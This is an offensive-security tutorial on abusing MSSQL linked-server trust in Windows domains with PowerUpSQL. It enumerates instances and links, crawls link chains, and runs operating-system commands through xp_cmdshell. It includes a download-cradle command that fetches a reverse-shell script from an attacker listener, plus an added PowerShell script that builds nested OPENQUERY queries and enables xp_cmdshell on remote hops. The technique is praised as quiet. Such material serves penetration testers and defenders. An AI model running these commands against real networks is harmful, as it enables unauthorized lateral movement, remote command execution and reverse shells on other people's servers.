MSSQL Server Trust Abuse
Windows domains commonly run several MSSQL instances, usually on dedicated servers that users and applications from other hosts connect to. A SQL Server in the domain is a good pivot for lateral movement, because domain users and groups are mapped to server logins and database roles, so a compromised domain account may already have access to one or more instances.
Database links add a second path. SQL Servers on a network are frequently linked to one another, and a linked server runs our queries under the credentials stored in the link, not under our own account. By chaining links we can run queries, and with enough privileges operating-system commands, on remote instances without ever authenticating to them directly. Links are not bounded by trusts: a link can cross domains within a forest or point at an instance in a completely separate forest.
The technique is also relatively quiet. Every command, including those that end up running on distant SQL Servers, is submitted from the one instance we already have a session on; the far servers only see queries arriving from a linked server they are configured to trust.
Enumeration
We can use PowerUpSQL.ps1 to enumerate SQL Servers.
Finding SQL Server Instances That Have an SPN Registered with the Domain Controller (and the service accounts they run as)

Get-SQLInstanceDomain

Finding Accessible SQL Servers

Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Retrieving Basic Server Information From Each Accessible Instance

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Searching for Database Links
Get-SQLServerLink -Instance <sql_server_domain> -Verbose
# Crawling the downstream database links reachable from a SQL Server you can access
Get-SQLServerLinkCrawl -Instance <sql_server_domain> -Verbose

Now We Can Execute Commands
The output of each query appears in the CustomQuery column of the crawl results; the Path column shows the link chain the query travelled through and the Sysadmin column whether the link login is sysadmin on that hop. Note that xp_cmdshell is disabled by default: enabling it on a remote hop requires a sysadmin link login on that instance and RPC Out enabled on the link, so a link that only carries OPENQUERY traffic gives query execution but not command execution.

Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'whoami'"

Get a Reverse Shell
The same query slot can launch a PowerShell download cradle on every hop that allows xp_cmdshell, here fetching a reverse-shell script such as Nishang's Invoke-PowerShellTcp.ps1 from a listener we control. Inside the T-SQL string single quotes are doubled, which is why the URL is wrapped in two apostrophes.

Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'powershell.exe iex(New-Object Net.WebClient).downloadString(''http://<ip:port>/Invoke-PowerShellTcp.ps1'')'"
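The crawl cmdlet hides what actually crosses each link. The following is an added example, not code from the page or from the PowerUpSQL project, that performs the same steps by hand with T-SQL sent through PowerUpSQL's Get-SQLQuery: list the links and their RPC Out setting, build a correctly quoted nested OPENQUERY for a multi-hop path, enable xp_cmdshell on a hop with EXEC ... AT, and read command output back. The instance name SQL01.corp.local, the link names SQL02 and SQL03 and the module path are assumptions for illustration.

```powershell
# Added example: manual database-link abuse with T-SQL via PowerUpSQL's Get-SQLQuery.
# Assumptions: PowerUpSQL.ps1 is in the current directory; SQL01.corp.local is an
# instance we can log in to; SQL02 and SQL03 are links in its chain. All hypothetical.
Import-Module .\PowerUpSQL.ps1

$Instance = 'SQL01.corp.local'

# 1. Enumerate links on the entry point. OPENQUERY works over any link that has
#    data access enabled; EXEC ... AT additionally needs is_rpc_out_enabled = 1.
$links = Get-SQLQuery -Instance $Instance -Query @"
SELECT name, data_source, is_rpc_out_enabled, is_data_access_enabled
FROM sys.servers
WHERE is_linked = 1
"@
$links | Format-Table -AutoSize

# 2. Build a nested OPENQUERY for a path of links. Every nesting level doubles the
#    single quotes of the text inside it, so a two-hop query already contains
#    quadrupled quotes; this helper does the escaping so we do not have to.
function New-LinkPathQuery {
    param(
        [Parameter(Mandatory)][string[]]$Path,   # link names from near hop to far hop
        [Parameter(Mandatory)][string]$Query     # T-SQL to run on the far hop
    )
    $sql = $Query
    # Wrap from the far end of the chain back towards the instance we are logged in to.
    for ($i = $Path.Count - 1; $i -ge 0; $i--) {
        $escaped = $sql -replace "'", "''"
        $sql = "SELECT * FROM OPENQUERY([$($Path[$i])], '$escaped')"
    }
    return $sql
}

# 3. Check who we are on each hop. The login is the credential stored in the link,
#    so the answer is independent of the domain account we used to reach SQL01.
$probe = "SELECT @@SERVERNAME AS srv, SYSTEM_USER AS login, IS_SRVROLEMEMBER('sysadmin') AS sa"
Get-SQLQuery -Instance $Instance -Query (New-LinkPathQuery -Path 'SQL02' -Query $probe)
Get-SQLQuery -Instance $Instance -Query (New-LinkPathQuery -Path 'SQL02','SQL03' -Query $probe)

# 4. xp_cmdshell is off by default. sp_configure and RECONFIGURE are not SELECT
#    statements, so they cannot travel inside OPENQUERY; EXEC ... AT runs the batch
#    on the linked server and requires RPC Out on the link plus sysadmin there.
$enable = @"
EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;
       sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL02]
"@
Get-SQLQuery -Instance $Instance -Query $enable

# 5. Run a command on the far hop and collect its rows through OPENQUERY; this is
#    what the crawl puts in the CustomQuery column.
$cmd = "EXEC master..xp_cmdshell 'whoami'"
Get-SQLQuery -Instance $Instance -Query (New-LinkPathQuery -Path 'SQL02' -Query $cmd)
```

Step 3 is worth running before anything destructive: a link whose stored login is not sysadmin on the far hop still answers probes but cannot enable xp_cmdshell, and the probe result tells you which hop in a longer chain is the one worth targeting.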